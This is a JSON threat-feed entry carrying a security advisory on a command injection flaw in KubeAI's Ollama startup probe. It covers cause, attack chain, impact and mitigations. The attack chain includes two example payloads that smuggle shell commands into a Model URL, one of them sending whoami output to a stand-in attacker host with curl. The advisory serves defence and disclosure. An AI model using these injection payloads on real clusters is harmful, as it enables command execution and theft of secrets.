{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/kubeai/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["kubeai","command-injection","kubernetes","cloud"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eKubeAI versions 0.23.1 and earlier are vulnerable to an OS command injection flaw in the Ollama engine\u0026rsquo;s startup probe. The vulnerability stems from the \u003ccode\u003eollamaStartupProbeScript()\u003c/code\u003e function, which constructs a shell command using \u003ccode\u003efmt.Sprintf\u003c/code\u003e with unsanitized model URL components (\u003ccode\u003eref\u003c/code\u003e and \u003ccode\u003emodelParam\u003c/code\u003e). These components are extracted from the Model custom resource URL. An attacker who can create or update \u003ccode\u003eModel\u003c/code\u003e custom resources can inject arbitrary shell commands, which are then executed within the model server pods. This occurs because the extracted URL components are not sanitized before being interpolated into a shell command executed by \u003ccode\u003ebash -c\u003c/code\u003e. Successful exploitation allows attackers to compromise the model serving infrastructure and potentially access sensitive information or execute commands on the underlying host.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains the ability to create or update \u003ccode\u003eModel\u003c/code\u003e custom resources in a KubeAI environment. This could be through compromised credentials, misconfigured RBAC permissions, or other vulnerabilities.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious \u003ccode\u003eModel\u003c/code\u003e custom resource with a specially crafted URL in the \u003ccode\u003espec.url\u003c/code\u003e field. The URL contains shell metacharacters and commands within the \u003ccode\u003eref\u003c/code\u003e component or the \u003ccode\u003emodel\u003c/code\u003e query parameter. For example, \u003ccode\u003eollama://registry.example.com/model;id\u0026gt;/tmp/pwned;echo\u003c/code\u003e or \u003ccode\u003epvc://my-pvc?model=qwen2:0.5b;curl${IFS}http://attacker.com/$(whoami);echo\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker applies the malicious \u003ccode\u003eModel\u003c/code\u003e resource to the Kubernetes cluster, triggering the KubeAI model controller.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eparseModelURL()\u003c/code\u003e function parses the malicious URL and extracts the unsanitized \u003ccode\u003eref\u003c/code\u003e and \u003ccode\u003emodelParam\u003c/code\u003e components.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eollamaStartupProbeScript()\u003c/code\u003e function constructs a shell command string using \u003ccode\u003efmt.Sprintf\u003c/code\u003e with the unsanitized \u003ccode\u003eref\u003c/code\u003e and \u003ccode\u003emodelParam\u003c/code\u003e components. The resulting command is intended to pull or copy the specified model.\u003c/li\u003e\n\u003cli\u003eThe KubeAI model controller creates a pod for the model server, configuring a startup probe that executes the crafted shell command via \u003ccode\u003ebash -c\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe Kubernetes kubelet executes the startup probe, running the attacker-injected shell commands within the pod\u0026rsquo;s context.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves arbitrary command execution inside the model server pod, potentially leading to data exfiltration, lateral movement, or compromise of the model serving infrastructure.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows for arbitrary command execution within KubeAI model server pods. This can lead to several severe consequences: data exfiltration from the pod\u0026rsquo;s environment (environment variables, mounted secrets, service account tokens), lateral movement to other cluster resources in multi-tenant environments, and compromise of the model serving infrastructure. An attacker with Model creation permissions can execute arbitrary commands in model pods, potentially accessing sensitive data. The vulnerability affects KubeAI installations version 0.23.1 and earlier.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade KubeAI to a version beyond 0.23.1 that includes the fix for CVE-2026-34940.\u003c/li\u003e\n\u003cli\u003eImplement strict RBAC policies to limit who can create or update \u003ccode\u003eModel\u003c/code\u003e custom resources.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect KubeAI Model Resource Command Injection\u0026rdquo; to identify malicious \u003ccode\u003eModel\u003c/code\u003e resources being created or updated.\u003c/li\u003e\n\u003cli\u003eMonitor Kubernetes audit logs for suspicious activity related to \u003ccode\u003eModel\u003c/code\u003e custom resource creation and updates.\u003c/li\u003e\n\u003cli\u003eIf upgrading is not immediately feasible, consider implementing a Kubernetes admission webhook that validates and sanitizes the \u003ccode\u003espec.url\u003c/code\u003e field of \u003ccode\u003eModel\u003c/code\u003e custom resources, allowing only alphanumeric characters, slashes, colons, dots, and hyphens.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-01T23:22:43Z","date_published":"2026-04-01T23:22:43Z","id":"/briefs/2026-04-kubeai-command-injection/","summary":"The KubeAI project is vulnerable to OS command injection because the `ollamaStartupProbeScript()` function constructs a shell command string using `fmt.Sprintf` with unsanitized model URL components (`ref`, `modelParam`), which is then executed via `bash -c` as a Kubernetes startup probe, allowing arbitrary command execution inside model server pods by attackers with the ability to create or update `Model` custom resources.","title":"KubeAI OS Command Injection via Model URL in Ollama Engine Startup Probe","url":"https://feed.craftedsignal.io/briefs/2026-04-kubeai-command-injection/"}],"language":"en","title":"CraftedSignal Threat Feed — Kubeai","version":"https://jsonfeed.org/version/1.1"}